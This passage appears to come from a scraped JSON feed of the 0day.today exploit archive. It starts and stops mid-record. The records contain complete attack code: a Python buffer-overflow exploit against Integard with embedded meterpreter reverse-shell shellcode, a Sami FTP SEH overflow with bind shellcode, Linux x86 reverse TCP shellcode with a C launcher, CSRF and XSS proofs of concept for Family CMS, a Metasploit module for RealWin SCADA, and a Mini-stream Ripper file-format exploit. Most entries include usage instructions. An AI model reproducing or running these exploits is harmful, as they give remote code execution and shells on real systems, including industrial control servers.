\"\\x28\\x3a\\x8a\\x56\\xf8\\x72\\x73\\xf4\\xc5\\xba\\x86\"\r\n meterpreter += \"\\x04\\x01\\x7c\\x78\\x73\\x7b\\x7e\\x05\\x84\\xb8\\xfc\"\r\n meterpreter += \"\\xd1\\x01\\x5b\\xa6\\x92\\xb2\\x87\\x56\\x77\\x24\\x43\"\r\n meterpreter += \"\\x54\\x3c\\x22\\x0b\\x79\\xc3\\xe7\\x27\\x85\\x48\\x06\"\r\n meterpreter += \"\\xe8\\x0f\\x0a\\x2d\\x2c\\x4b\\xc9\\x4c\\x75\\x31\\xbc\"\r\n meterpreter += \"\\x71\\x65\\x9a\\x61\\xd4\\xed\\x37\\x76\\x65\\xac\\x5f\"\r\n meterpreter += \"\\xbb\\x44\\x4f\\xa0\\xd3\\xdf\\x3c\\x92\\x7c\\x74\\xab\"\r\n meterpreter += \"\\x9e\\xf5\\x52\\x2c\\x96\\x11\\x65\\xe2\\x10\\x71\\x9b\"\r\n meterpreter += \"\\x03\\x61\\x58\\x58\\x57\\x31\\xf2\\x49\\xd8\\xda\\x02\"\r\n meterpreter += \"\\x75\\x0d\\x76\\x08\\xe1\\xa4\\x87\\x0c\\x71\\xd0\\x85\"\r\n meterpreter += \"\\x0c\\x52\\x08\\x03\\xea\\xc4\\x1a\\x43\\xa2\\xa4\\xca\"\r\n meterpreter += \"\\x23\\x12\\x4d\\x01\\xac\\x4d\\x6d\\x2a\\x66\\xe6\\x04\"\r\n meterpreter += \"\\xc5\\xdf\\x5f\\xb1\\x7c\\x7a\\x2b\\x20\\x80\\x50\\x56\"\r\n meterpreter += \"\\x62\\x0a\\x51\\xa7\\x2d\\xfb\\x10\\xbb\\x5a\\x9c\\xda\"\r\n meterpreter += \"\\x43\\x9b\\x09\\xdb\\x29\\x9f\\x9b\\x8c\\xc5\\x9d\\xfa\"\r\n meterpreter += \"\\xfb\\x4a\\x5d\\x29\\x78\\x8c\\xa1\\xac\\x49\\xe7\\x94\"\r\n meterpreter += \"\\x3a\\xf6\\x9f\\xd8\\xaa\\xf6\\x5f\\x8f\\xa0\\xf6\\x37\"\r\n meterpreter += \"\\x77\\x91\\xa4\\x22\\x78\\x0c\\xd9\\xff\\xed\\xaf\\x88\"\r\n meterpreter += \"\\xac\\xa6\\xc7\\x36\\x8b\\x81\\x47\\xc8\\xfe\\x91\\x80\"\r\n meterpreter += \"\\x36\\x7d\\xbe\\x28\\x5f\\x7d\\xfe\\xc8\\x9f\\x17\\xfe\"\r\n meterpreter += \"\\x98\\xf7\\xec\\xd1\\x17\\x38\\x0d\\xf8\\x7f\\x50\\x84\"\r\n meterpreter += \"\\x6d\\xcd\\xc1\\x99\\xa7\\x93\\x5f\\x9a\\x44\\x08\\x6f\"\r\n meterpreter += \"\\xe1\\x25\\xaf\\x90\\x16\\x2c\\xd4\\x90\\x17\\x50\\xea\"\r\n meterpreter += \"\\xad\\xce\\x69\\x98\\xf0\\xd3\\xcd\\x83\\xee\\xf9\\x3b\"\r\n meterpreter += \"\\x2c\\xb7\\x68\\x86\\x31\\x48\\x47\\xc5\\x4f\\xcb\\x6d\"\r\n meterpreter += \"\\xb6\\xab\\xd3\\x04\\xb3\\xf0\\x53\\xf5\\xc9\\x69\\x36\"\r\n meterpreter += \"\\xf9\\x7e\\x89\\x13\"\r\n\r\n if target == \"1\":\r\n print \"[*] Sending Windows XP payload using meterpreter/reverse_tcp\"\r\n # JMP ESP at 0x3E087557 in iertutil.dll\r\n crash = \"A\" * 512\r\n crash += pack(\"<L\",0x3E087557)\r\n crash += meterpreter\r\n crash += \"C\" * (1500 - len(crash))\r\n\r\n buffer = \"\"\r\n buffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\n if target == \"2\":\r\n print \"[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp\"\r\n \r\n # ASLR IS ON!!! MUST USE NON-ASLR MODULE!\r\n # POP POP RET in integard.exe (ASLR disabled)\r\n nSEH = \"\\xEB\\xD0\\x90\\x90\" # Jump 48 bytes backwards\r\n SEH = pack(\"<L\",0x004042B0)\r\n\r\n jumpCall = \"\\xEB\\x09\" # Jump 11 bytes forward to hit the CALL in bigBackJump\r\n bigBackJump = \"\\x59\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFF\\xE1\\xE8\\xF2\\xFF\\xFF\\xFF\"\r\n \r\n crash = \"\\x90\" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)\r\n crash += meterpreter\r\n crash += \"\\x90\" * 50\r\n crash += jumpCall\r\n crash += bigBackJump\r\n crash += nSEH\r\n crash += SEH\r\n\r\n\r\n buffer = \"\"\r\n buffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\"\r\n buffer += \"Host: 10.0.0.130:18881\\r\\n\"\r\n buffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\"\r\n buffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n buffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\"\r\n buffer += \"Accept-Encoding: gzip, deflate\\r\\n\"\r\n buffer += \"Referer: http://10.0.0.130:18881/\\r\\n\"\r\n buffer += \"Connection: close\\r\\n\"\r\n buffer += \"Upgrade-Insecure-Requests: 1\\r\\n\"\r\n buffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n buffer += \"Content-Length: 78\\r\\n\\r\\n\"\r\n buffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\"\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n s.send(buffer)\r\n s.close()\r\n print \"[*] Done\"\r\n\r\nmain()\n\n# 0day.today [2019-12-06] #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33629"}, {"lastseen": "2018-01-03T09:02:07", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "href": "https://0day.today/exploit/description/26196", "id": "1337DAY-ID-26196", "type": "zdt", "title": "KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH) Exploit", "sourceData": "#/usr/bin/python\r\n#-*- Coding: utf-8 -*-\r\n \r\n### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### \r\n \r\n# Date: 2016-01-11\r\n# Exploit Author: n30m1nd\r\n# Vendor Homepage: http://www.karjasoft.com/\r\n# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe\r\n# Version: 2.0.2\r\n# Tested on: Win7 64bit and Win10 64 bit\r\n \r\n# Credits\r\n# =======\r\n# Thanks to PHRACK for maintaining all the articles up for so much time... \r\n# These are priceless and still current for exploit development!!\r\n# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better\r\n \r\n# How to\r\n# ======\r\n# * Open Sami FTP Server and open its graphical interface\r\n# * Run this python script and write the IP to attack\r\n# * Connect to the same IP on port 4444\r\n#\r\n# BONUS\r\n# =====\r\n# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each\r\n# start and so, it will crash and run our shellcode everytime it starts.\r\n \r\n# Why?\r\n# ====\r\n# The graphical interface tries to show the user name which produces an overflow overwriting SEH\r\n \r\n# Exploit code\r\n# ============\r\n \r\nimport socket\r\nimport struct\r\n \r\ndef doHavoc(ipaddr):\r\n # Bad chars: 00 0d 0a ff\r\n alignment = \"\\x90\"*3\r\n \r\n jmpfront = \"345A7504\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command \r\n # 34 5A XOR AL,5A\r\n # 75 04 JNE SHORT +04\r\n \r\n # pop pop ret in tmp01.dll\r\n popret = 0x10022ADE\r\n \r\n # fstenv trick to get eip: phrack number 62\r\n # and store it into EAX for the metasploit shell (BufferRegister)\r\n getEIPinEAX = \"D9EED934E48B44E40C040b\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command\r\n # D9EE FLDZ\r\n # D934E4 FSTENV SS:[ESP]\r\n # 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]\r\n # 04 0B ADD AL,0B\r\n \r\n # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX\r\n shellcode = (\r\n getEIPinEAX +\r\n \"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p\"\r\n \"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq\"\r\n \"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc\"\r\n \"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ\"\r\n \"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb\"\r\n \"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9\"\r\n \"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP\"\r\n \"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq\"\r\n \"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6\"\r\n \"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm\"\r\n \"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3\"\r\n \"ioJuAA\"\r\n )\r\n \r\n # Final payload, SEH overwrite ocurrs at 600 bytes\r\n payload = alignment + \".\"*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack(\"<L\", popret) + shellcode\r\n try:\r\n s = socket.create_connection((ipaddr, 21))\r\n s.send(\"USER \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n \r\n s.send(\"PASS \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n print s.recv(4096)\r\n except e:\r\n print str(e)\r\n exit(\"[+] Couldn't connect\")\r\n \r\nif __name__ == \"__main__\":\r\n ipaddr = raw_input(\"[+] IP: \")\r\n doHavoc(ipaddr)\r\n while raw_input(\"[?] Got shell?(y/n) \").lower() == \"n\":\r\n doHavoc(ipaddr)\r\n print \"[+] Enjoy...\"\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/26196", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-04T11:11:42", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2016-04-25T00:00:00", "published": "2016-04-25T00:00:00", "id": "1337DAY-ID-25670", "href": "https://0day.today/exploit/description/25670", "type": "zdt", "title": "Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)", "sourceData": "/*\r\n \r\n# Title: linux x86 reverse tcp (ipv6)\r\n# Date: 22-04-2016\r\n# Exploit Author: Roziul Hasan Khan Shifat\r\n# Tested on: kali 2.0 and Ubuntu 14.04 LTS\r\n# Contact: [email\u00a0protected]\r\n \r\n*/\r\n \r\n/*\r\nsection .text\r\n global _start\r\n_start:\r\n \r\n;;socket()\r\nxor ebx,ebx\r\nmul ebx ;null out eax\r\n \r\npush byte 6\r\npush byte 0x1\r\npush byte 10\r\n \r\nmov ecx,esp\r\n \r\nmov al,102 ;socketcall()\r\nmov bl,1 ;socket()\r\nint 0x80\r\n \r\nmov esi,eax ;storing socket descriptor (we know return value of any syscall stores in eax)\r\n \r\nxor eax,eax\r\n \r\nmov al,2\r\nxor ebx,ebx\r\nint 80h\r\n \r\n \r\ncmp eax,ebx\r\nje connect\r\nja exit\r\n \r\n;------------------\r\n \r\n;------------------------\r\n \r\nconnect:\r\n \r\nxor ecx,ecx\r\n;-------------------------------------------------------\r\n;struct sockaddr_in6\r\nxor ebx,ebx\r\n \r\npush dword ebx ;sin6_scope_id 4 byte\r\n \r\npush dword 0x8140a8c0 ; only change it to Your ipv4 address (current ipv4 192.168.64.129)\r\n \r\npush word 0xffff\r\npush dword ebx\r\npush dword ebx\r\npush word bx ;sin6_addr 16 byte (ipv6 address ::ffff:192.168.64.129)\r\n \r\npush dword ebx ;sin6_flowinfo=4 byte\r\n \r\npush word 0xc005 ;sin6_port 2 byte (port 1472)\r\n \r\npush word 10 ;sa_family_t=2 byte \r\n \r\n;end of struct sockaddr_in6\r\n \r\nmov ecx,esp\r\n \r\n;--------------------------------------------\r\n \r\n;;connect()\r\n \r\npush byte 28 ;sizeof ;struct sockaddr_in6\r\n \r\npush ecx\r\n \r\npush esi\r\n \r\nxor ebx,ebx\r\nxor eax,eax\r\nmov al,102\r\nmov bl,3 ;connect()\r\nmov ecx,esp\r\nint 0x80\r\n \r\nxor ebx,ebx\r\n \r\ncmp eax,ebx\r\njne retry ;if it fails to connect ,it will retry to connect to attacker after 10 seconds\r\n \r\n;dup2(sd,0)\r\n \r\nxor ecx,ecx\r\nmul ecx\r\n \r\nmov ebx,esi\r\nmov al,63\r\nint 80h\r\n \r\n;dup2(sd,1)\r\n \r\nxor eax,eax\r\ninc ecx\r\n \r\nmov ebx,esi\r\nmov al,63\r\nint 80h\r\n \r\n;;dup2(sd,2)\r\n \r\nxor eax,eax\r\ninc ecx\r\n \r\nmov ebx,esi\r\nmov al,63\r\nint 80h\r\n \r\n;;execve(/bin//sh)\r\n \r\nxor edx,edx\r\nmul edx\r\n \r\npush edx ;null terminated /bin//sh\r\npush 0x68732f2f\r\npush 0x6e69622f\r\n \r\nmov ebx,esp\r\n \r\npush edx\r\npush ebx\r\n \r\nmov ecx,esp\r\n \r\nmov al,11 ;execve()\r\nint 0x80\r\n \r\nret\r\n \r\n;------------------------------------------------------\r\n \r\nretry:\r\n \r\nxor ebx,ebx\r\n \r\npush ebx\r\npush byte 10\r\n \r\nmul ebx\r\nmov ebx,esp\r\n \r\nmov al,0xa2 ;nanosleep()\r\n \r\nint 80h\r\n \r\njmp connect\r\n \r\nret\r\n \r\n;----------------------------\r\nexit:\r\nxor eax,eax\r\nmov al,1\r\nint 80h\r\n \r\n*/\r\n \r\n \r\n/* \r\nto compile:\r\n \r\n$nasm -f elf filename.s\r\n$ld filename.o\r\n$./a.out\r\n \r\nto compile shellcode\r\n \r\n$gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\r\n$./shellcode\r\n \r\n*/\r\n \r\n \r\n#include<string.h>\r\n#include<stdio.h>\r\nchar shellcode[]=\"\\x31\\xdb\\xf7\\xe3\\x6a\\x06\\x6a\\x01\\x6a\\x0a\\x89\\xe1\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc6\\x31\\xc0\\xb0\\x02\\x31\\xdb\\xcd\\x80\\x39\\xd8\\x74\\x02\\x77\\x77\\x31\\xc9\\x31\\xdb\\x53\\x68\\xc0\\xa8\\x40\\x81\\x66\\x6a\\xff\\x53\\x53\\x66\\x53\\x53\\x66\\x68\\x05\\xc0\\x66\\x6a\\x0a\\x89\\xe1\\x6a\\x1c\\x51\\x56\\x31\\xdb\\x31\\xc0\\xb0\\x66\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x31\\xdb\\x39\\xd8\\x75\\x36\\x31\\xc9\\xf7\\xe1\\x89\\xf3\\xb0\\x3f\\xcd\\x80\\x31\\xc0\\x41\\x89\\xf3\\xb0\\x3f\\xcd\\x80\\x31\\xc0\\x41\\x89\\xf3\\xb0\\x3f\\xcd\\x80\\x31\\xd2\\xf7\\xe2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\xc3\\x31\\xdb\\x53\\x6a\\x0a\\xf7\\xe3\\x89\\xe3\\xb0\\xa2\\xcd\\x80\\xeb\\x8a\\xc3\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\r\n \r\n \r\nint (*exec_shellcode)();\r\nmain()\r\n{\r\nprintf(\"Shellcode length: %ld\\n\",(long)strlen(shellcode));\r\nexec_shellcode=(int(*)())shellcode;\r\n(*exec_shellcode)();\r\n \r\n}\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25670"}, {"lastseen": "2018-01-02T09:03:54", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-03-26T00:00:00", "published": "2012-03-26T00:00:00", "id": "1337DAY-ID-17835", "href": "https://0day.today/exploit/description/17835", "type": "zdt", "title": "Family CMS 2.9 and earlier multiple Vulnerabilities", "sourceData": "Family CMS 2.9 and earlier multiple Vulnerabilities\r\n===================================================================================\r\n# Exploit Title: Family CMS 2.9 and earlier multiple Vulnerabilities\r\n# Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download\r\n# Author: Ahmed Elhady Mohamed\r\n# Email : [email\u00a0protected]\r\n# version: 2.9\r\n# Category: webapps\r\n# Tested on: ubuntu 11.4 \r\n===================================================================================\r\n \r\n \r\n Tips:\r\n *****First we must install all optional sections during installation process.***** \r\n \r\n1- CSRF Vulnerabilities :\r\n \r\n POC 1: Page \"familynews.php\"\r\n \r\n \r\n <html>\r\n <head>\r\n <script type=\"text/javascript\">\r\n function autosubmit() {\r\n document.getElementById('ChangeSubmit').submit();\r\n } \r\n </script>\r\n </head>\r\n <body onLoad=\"autosubmit()\">\r\n <form method=\"POST\" action=\"http://[localhost]/FCMS_2.9/familynews.php\" id=\"ChangeSubmit\">\r\n <input type=\"hidden\" name=\"title\" value=\"test\" />\r\n <input type=\"hidden\" name=\"submitadd\" value=\"Add\" />\r\n <input type=\"hidden\" name=\"post\" value=\"testcsrf\" />\r\n <input type=\"submit\" value=\"submit\"/>\r\n </form>\r\n </body>\r\n </html>\r\n \r\n --------------------------------------------------------------------------------------------------------\r\n \r\n POC 2:Page \"prayers.php\"\r\n \r\n \r\n <html>\r\n <head>\r\n <script type=\"text/javascript\">\r\n function autosubmit() {\r\n document.getElementById('ChangeSubmit').submit();\r\n } \r\n </script>\r\n </head>\r\n <body onLoad=\"autosubmit()\">\r\n <form method=\"POST\" action=\"http://[localhost]/FCMS_2.9/prayers.php\" id=\"ChangeSubmit\">\r\n <input type=\"hidden\" name=\"for\" value=\"test\" />\r\n <input type=\"hidden\" name=\"submitadd\" value=\"Add\" />\r\n <input type=\"hidden\" name=\"desc\" value=\"testtest\" />\r\n <input type=\"submit\" value=\"submit\"/>\r\n </form>\r\n \r\n </body>\r\n </html>\r\n----------------------------------------------------------------------------------------------------------------------------\r\n2-Reflected XSS\r\n \r\n POC : http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E\r\n \r\n-----------------------------------------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17835"}, {"lastseen": "2018-04-13T07:50:35", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2011-06-22T00:00:00", "published": "2011-06-22T00:00:00", "id": "1337DAY-ID-16370", "href": "https://0day.today/exploit/description/16370", "type": "zdt", "title": "RealWin SCADA Server DATAC Login Buffer Overflow", "sourceData": "##\r\n# $Id: realwin_on_fcs_login.rb 13007 2011-06-22 22:36:55Z sinn3r $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::Seh\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'RealWin SCADA Server DATAC Login Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack buffer overflow in DATAC Control\r\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\r\n earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\r\n packet containing a long username, an attacker may be able to\r\n execute arbitrary code.\r\n },\r\n 'Author' =>\r\n [\r\n 'Luigi Auriemma', #discovery\r\n 'MC',\r\n 'B|H <bh[AT]bufferattack.com>'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 13007 $',\r\n 'References' =>\r\n [\r\n [ 'URL', 'http://aluigi.altervista.org/adv/realwin_2-adv.txt' ],\r\n [ 'URL', 'http://www.dataconline.com/software/realwin.php' ],\r\n ],\r\n 'Privileged' => true,\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 450,\r\n 'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\r\n 'StackAdjustment' => -3500,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Universal',\r\n {\r\n 'Offset' => 392, # Offset to SEH\r\n 'Ret' => 0x40012540, # pop/pop/ret @FlexMLang.dll\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 21 2011'))\r\n \r\n register_options([Opt::RPORT(910)], self.class)\r\n end\r\n \r\n def exploit\r\n data = [0x67542310].pack('V')\r\n data << [0x00000824].pack('V')\r\n data << [0x00110011].pack('V')\r\n data << \"\\x01\\x00\"\r\n data << rand_text_alpha_upper(target['Offset'])\r\n data << generate_seh_payload(target.ret)\r\n data << rand_text_alpha_upper(17706 - payload.encoded.length)\r\n data << [0x451c3500].pack('V')\r\n data << [0x00000154].pack('V')\r\n data << [0x00020040].pack('V')\r\n \r\n connect\r\n print_status(\"Trying target #{target.name}...\")\r\n sock.put(data)\r\n select(nil,nil,nil,0.5)\r\n handler\r\n disconnect\r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16370"}, {"lastseen": "2018-02-06T01:26:46", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-12-27T00:00:00", "published": "2009-12-27T00:00:00", "id": "1337DAY-ID-8215", "href": "https://0day.today/exploit/description/8215", "type": "zdt", "title": "Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow", "sourceData": "============================================================================\r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n============================================================================\r\n\r\n\r\n\r\n# Title: Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: mr_me\r\n# Published: 2009-12-27\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n/*\r\n \r\nriptheministreamripper.c\r\n \r\nMini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit\r\nexploited by: mr_me\r\nGreetz to the Corlan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r\r\nVisit: corelanc0d3r's blog http://www.corelan.be:8800/\r\nreference: http://www.exploit-db.com/exploits/10646\r\nDownload: http://mini-stream.net/\r\nTested on: Windows XP sp3\r\n \r\nNote: *** For educational purposes only ***\r\n \r\nusage:\r\nCompile and execute to create the .pls file and upload it to your favourite server.\r\nThen click on 'LOAD' and then 'URL'. Enter the evil URL, BAM you win.\r\n \r\n[email\u00a0protected]:~$ nc -v 192.168.2.5 4444\r\n192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed out\r\n(UNKNOWN) [192.168.2.5] 4444 (?) open\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n \r\nC:\\Program Files\\Mini-stream\\Mini-stream Ripper>\r\n \r\nI hope everyone had a Merry Christmas! and soon to have a Happy New Year!\r\n \r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n \r\n/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum\r\n http://metasploit.com */\r\n \r\nunsigned char shell[] =\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\"\r\n\"\\x4f\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x58\"\r\n\"\\x4e\\x56\\x46\\x32\\x46\\x32\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x58\\x4e\\x47\"\r\n\"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x41\\x4b\\x58\"\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x43\\x4e\\x42\\x53\\x49\\x54\\x4b\\x38\"\r\n\"\\x46\\x53\\x4b\\x58\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\"\r\n\"\\x46\\x58\\x42\\x4c\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\"\r\n\"\\x44\\x4c\\x4b\\x4e\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x4a\\x42\\x45\\x57\"\r\n\"\\x43\\x4e\\x4b\\x58\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x58\"\r\n\"\\x4e\\x50\\x4b\\x34\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x43\\x30\"\r\n\"\\x4e\\x52\\x4b\\x48\\x49\\x38\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x56\\x43\\x4c\"\r\n\"\\x41\\x43\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x33\\x4b\\x58\\x42\\x44\"\r\n\"\\x4e\\x50\\x4b\\x38\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x48\\x42\\x54\\x4a\\x50\"\r\n\"\\x50\\x35\\x4a\\x46\\x50\\x58\\x50\\x44\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x41\\x53\\x4b\\x4d\\x48\\x36\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x33\"\r\n\"\\x44\\x33\\x4a\\x56\\x47\\x47\\x43\\x47\\x44\\x33\\x4f\\x55\\x46\\x55\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x4f\\x35\\x49\\x48\\x45\\x4e\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x50\"\r\n\"\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x50\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x49\\x4d\"\r\n\"\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\"\r\n\"\\x43\\x55\\x43\\x55\\x43\\x45\\x43\\x34\\x43\\x45\\x43\\x34\\